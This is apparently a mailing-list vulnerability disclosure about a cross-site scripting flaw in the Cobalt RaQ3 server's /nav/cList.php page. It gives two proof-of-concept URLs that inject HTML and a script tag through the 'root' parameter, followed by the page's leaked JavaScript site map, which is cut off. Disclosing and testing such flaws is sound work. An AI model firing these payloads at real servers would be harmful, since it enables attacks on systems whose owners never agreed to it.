Alex Hernandez just did a great write up on Cobalt cube 4's I took a few minutes to check my cube 3 out a bit I ended up finding a css issue as well. Below is the info from my 2 second audit.

 <mailto:al3xhernandezureach.com>

Try either of the following URLs against your RAQ3

http://host/nav/cList.php?root=><h1>www.snosoft.com rocks</h1>
http://host/nav/cList.php?root=><script>alert('Snosoft Rocks')/<script>

You will see your code followed by this chunk of java code that was trying to run.

"; // get tab configuration from parameter var isTabbed = true; if("" ==
"false") isTabbed = false; // build site map siteMap = new Object();
top.siteMap = siteMap; siteMap.documentation = new
top.code.mItem_Item("documentation", "User Manuals", "Browse the Cobalt
server documentation.", "", "/base/documentation/viewManual.php", false,
true, ""); siteMap.documentation_folder = new
top.code.mItem_Item("documentation_folder", "Documentation", "On-line
product manuals and documentation.", "", "", false, true, "");
siteMap.documentation_logout = new
top.code.mItem_Item("documentation_logout", "Close", "Click to close the
documentation browser", "logout", "/base/documentation/logout.php",
false, true, ""); siteMap.documentation_root = new
top.code.mItem_Item("documentation_root", "", "", "", "", false, true,
""); siteMap.base_manual = new top.code.mItem_Item("base_manual", "View
Documentation", "Click here to view documentation. ", "", "javascript:
open(\047/base/documentation/viewManual.php?\047);
top.code.cList_repaint(1);", false, true, ""); siteMap.base_manualButton
= new top.code.mItem_Item("base_manualButton", "View Documentation",
"Click here to view on-line product manuals and documentation.",
"manualOff", "javascript:
open(\047/nav/cList.php?root=documentation_root\047);
top.code.tab_repaint();", false, true, ""); siteMap.base_cacheACL = new
top.code.mItem_Item("base_cacheACL", "Restricted Access", "Web access
can be controlled here if this server is being used as a gateway or
proxy.", "", "/base/cacheACL/acl.php", false, true, "");
siteMap.base_cache = new top.code.mItem_Item("base_cache", "Web
Caching", "Web Caching Settings can be changed here.", "",
"/base/cache/cache.php", false, true, ""); siteMap.base_disk_usage = new
top.code.mItem_Item("base_disk_usage", "Disk", "Disk usage statistics
can be viewed here.", "", "/base/quotastats/diskusage.php", false, true,
""); siteMap.base_webstats = new top.code.mItem_Item("base_webstats",
"Web", "Web server usage statistics can be found here.", "",
"/base/webstats/webtotals.php", false, true, "");
siteMap.base_amSettings = new top.code.mItem_Item("base_amSettings",
"Settings", "Active Monitor Settings can be configured here.", "",
"/base/am/amSettings.php", false, true, ""); siteMap.base_amStatus = new
top.code.mItem_Item("base_amStatus", "Status", "Active Monitor status
information can be viewed here.", "", "/base/am/amStatus.php", false,
true, ""); siteMap.base_monitor = new
top.code.mItem_Item("base_monitor", "Active Monitor", "System components
can be checked for correct operation here.", "", "", false, true, "");
siteMap.base_monitorLight = new top.code.mItem_Item("base_monitorLight",
"Active Monitor", "Click here to view Active Monitor status information.
This icon turns red if any of the components monitored by Active Monitor
have severe problems.", "monitorOff", "javascript:
top.code.tab_selectPath(\047base_amStatus\047);
top.code.cList_selectPath(\047base_amStatus\047)", false, true, "");
siteMap.base_backup = new top.code.mItem_Item("base_backup", "Backup",
"Backups can be scheduled and viewed here.", "",
"/base/backup/scheduleList.php", false, true, ""); siteMap.base_restore
= new top.code.mItem_Item("base_restore", "Restore", "Restores can be
selected and activated here.", "", "/base/backup/restoreList.php",
false, true, ""); siteMap.webmail_compose = new
top.code.mItem_Item("webmail_compose", "Compose", "Click here to compose
a new email message.", "", "/base/webmail/compose.php", false, true,
""); siteMap.webmail =

-KF

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]